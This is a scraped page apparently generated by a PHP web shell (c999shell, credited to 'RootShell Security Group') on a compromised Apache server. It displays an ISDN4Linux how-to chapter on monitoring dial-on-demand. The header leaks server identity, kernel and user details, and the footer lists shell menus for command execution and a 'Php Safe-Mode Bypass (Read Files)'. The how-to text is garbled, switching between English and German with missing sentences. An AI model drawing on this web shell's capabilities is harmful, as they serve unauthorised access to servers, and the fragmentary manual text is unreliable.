Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /usr/share/doc/isdn4k-utils-3.2/ drwxr-xr-x |
Viewing file: EN-i4l-9.html (8.34 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | 9. Monitoring Dial-On-DemandDuring the configuration you should monitor the system to determine when and why a connection is made. Otherwise you can quickly rack up unwanted phone bills. One can be sure, however, that a connection is never made or kept open for no reason. This occurs only even if packets are actually sent out over the line. Thus, you need to check the server services installed on the computer, whether they were configured correctly and to if necessary find out the cause of the connection. 9.1 Monitoring connectionsThere are a number of ISDN status monitors. The most important is imon; this console program can be started in any environment, reacts promptly and does not devour system resources. Other programs are: 9.2 Determining the reason for the connection
9.3 Analyzing connectionsThe program With the toolM
9.4 Dial-On-Demand an- und ausstellenDas i4l-Subsystem ist (wenn es denn einmal gestartet wurde) nicht dafür vorgesehen, daß Verbindungen nur manuell gestartet werden. Man könnte das Konzept bei i4l also auch so formulieren: wenn es gestartet ist, besteht ständig eine Verbindung, die aber automatisch gekappt wird, wenn nichts passiert. Wer es dennoch machen will, der entferne einfach die Default-Route. In diesen Fall wird nur noch dann eine Verbindung aufgefgebaut, wenn ein IP-Paket an die direkte Gegenstelle geschickt wird, was i.A. nicht vorkommt, da diese Gegenstelle keine Internetdienste anbietet und daher von keinem Client angesprochen wird. Als endgültigen Schritt, kann man auch das komplette Interface (ippp0) herunterfahren, dann können grundsätzlich keine Verbindungen aufgebaut werden. 9.5 Tips im S.u.S.E. SystemMan kann die Runlevel-Scripts natürlich auch manuell benutzen: /sbin/init.d/i4l stop fährt alle ISDN-Netzdevices runter, /sbin/init.d/i4l start /sbin/init.d/route legt sie wieder an und setzt die Routen. Wer bei einer syncPPP-Verbindung die Verbindung nur manuell
starten möchte, kann eine Eigenschaft des Scriptes
Gestartet werden kann dann nur mit dem Kommando: isdnctrl dial ippp0 und wer manuell Auflegen will: isdnctrl hangup ippp0 9.6 Wie erlaube ich normalen Benutzern Dial-In-Demand zu aktivieren?Am besten garnicht, denn das ist Aufgabe des Administrators. Es ist nur diesem vorbehalten, Netzdevices und Routen zu konfigurieren. Versuche nicht, den notwendigen Programmen suid-Attribute zu geben! Erstens ist die Aufgabe sehr schwer, und zweitens handelt man sich damit ein riesisges Sicherheitsloch ein, denn wenn diese Programme erstmal offen sind, lassen sich auch andere unerwünschte Dinge damit tun. Einem einzelnen Script suid-Attribute zu geben, ist unter Linux ebenfalls verboten. Wer es dennoch unbedingt machen will, der benutze ein Paket
wie z.B. Hier ein einfaches Beispiel:
Next Previous Contents |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0098 ]-- |